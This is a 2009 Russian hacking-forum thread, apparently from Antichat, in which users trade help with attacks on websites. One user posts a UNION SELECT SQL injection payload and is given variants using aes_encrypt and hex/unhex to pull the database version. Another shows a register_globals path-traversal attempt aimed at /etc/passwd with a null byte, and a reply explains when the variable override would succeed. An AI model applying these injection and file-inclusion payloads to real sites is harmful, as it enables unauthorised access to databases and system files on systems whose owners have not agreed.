22.02.2009, 17:27
|
|
Banned
Регистрация: 20.06.2008
Сообщений: 296
С нами:
9416045
Репутация:
126
|
|
1. До перестановки системы у меня в закладках был хороший онлайн декодирощик, адрес вспомнить немогу... а он во всё подряд переводил... сожет кто подкинет линк. кто чем пользуется!.
2. /index1.php?show=about&id0=-1+union+select+1,2,3 --
вывод на 2 поля 1 и 2 .... пишу version() или @@version ошибка.. что делать?
|
|
|
22.02.2009, 17:34
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
2 F4R
www.x3k.ru
http://www.webfuture.ru/igo/convert.php
/index1.php?show=about&id0=-1+union+select+1,aes_decrypt(aes_encrypt(version() ),0x71),0x71),3 --
|
|
|
|
22.02.2009, 17:38
|
|
Banned
Регистрация: 20.06.2008
Сообщений: 296
С нами:
9416045
Репутация:
126
|
|
Сообщение от Gorev
2 F4R
www.x3k.ru
http://www.webfuture.ru/igo/convert.php
/index1.php?show=about&id0=-1+union+select+1,aes_decrypt(aes_encrypt(version() ),0x71),0x71),3 --
x2k.ru
тормозной и неудобный а второй тока в sql и ораклу умеет... нао что то другое... или может есть какая то програмулька ?
а насчёт aes_decrypt(aes_encrypt(version() ),0x71),0x71)
неканает!
|
|
|
|
22.02.2009, 17:40
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
попробуй тогда
unhex i hex
|
|
|
|
22.02.2009, 18:22
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
С нами:
9288132
Репутация:
571
|
|
а второй тока в sql и ораклу умеет
А что тебе ещё надо?
а насчёт aes_decrypt(aes_encrypt(version() ),0x71),0x71)
неканает!
@@version?
Кинь ссылку, да и все..
|
|
|
|
22.02.2009, 18:39
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
2 R1dex
уже всё решили по аcьке там всё тривиально, просто до невозможного, но парень молодой у него всё получится...
|
|
|
|
22.02.2009, 19:23
|
|
Banned
Регистрация: 20.06.2008
Сообщений: 296
С нами:
9416045
Репутация:
126
|
|
Сообщение от Gorev
2 R1dex
уже всё решили по аcьке там всё тривиально, просто до невозможного, но парень молодой у него всё получится...
да, огромное тебе спасибо!
|
|
|
|
22.02.2009, 20:11
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами:
10470131
Репутация:
142
|
|
Код:
Есть скрипт следующего содержания:
<?php
$base_url="";
require_once("func.php");
$l=db_connect();
$id_page=28;
echo_body($id_page);
require($base_url."inc/top2.inc.php");
//==
?>
<?php
//==
require($base_url."inc/bottom6.inc.php");?>
на сервере register_globals = On и mysql_quotes_gpc = Off
Могу ли я переопределить переменную $base_url ?
Пробовал так:
site.ru/script.php?base_url=../../../../../../../../../../../../etc/passwd%00
Но не сработало...
|
|
|
|
22.02.2009, 21:12
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
Сообщение от Велемир
Могу ли я переопределить переменную $base_url ?
Как обычно умудрился внести путаницу даже в этот вопрос 
Если это один скрипт, то нет не сможешь. Если это 2 разных файла то во втором сможешь
Тоесть тут
PHP код:
<?php
$base_url="";
require_once("func.php");
$l=db_connect();
$id_page=28;
echo_body($id_page);
require($base_url."inc/top2.inc.php");
//==
?>
Переменная определена
а тут нет
PHP код:
<?php
//==
require($base_url."inc/bottom6.inc.php");
?>
Если всё это в одном файле, то нет. Я просто зная твои вопросы не удивлюсь , если это 2 разных файла.
-------------------------------
2 it's mу ты или перепиши код в вопросе, или на словах объясни, что там у тебя на что заменяется. Твой код вообще работать не будет, и логика SQL запроса тоже не вполне понятна
|
|
|
|
22.02.2009, 21:59
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами:
10470131
Репутация:
142
|
|
В одном файле.Но разные скрипты.Какая разница,определена переменная или нет.если регистр глобалс есть,а значит я могу переопределить любую переменную.Разве не так ?)Во всех файлах такая же фигня =_=
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
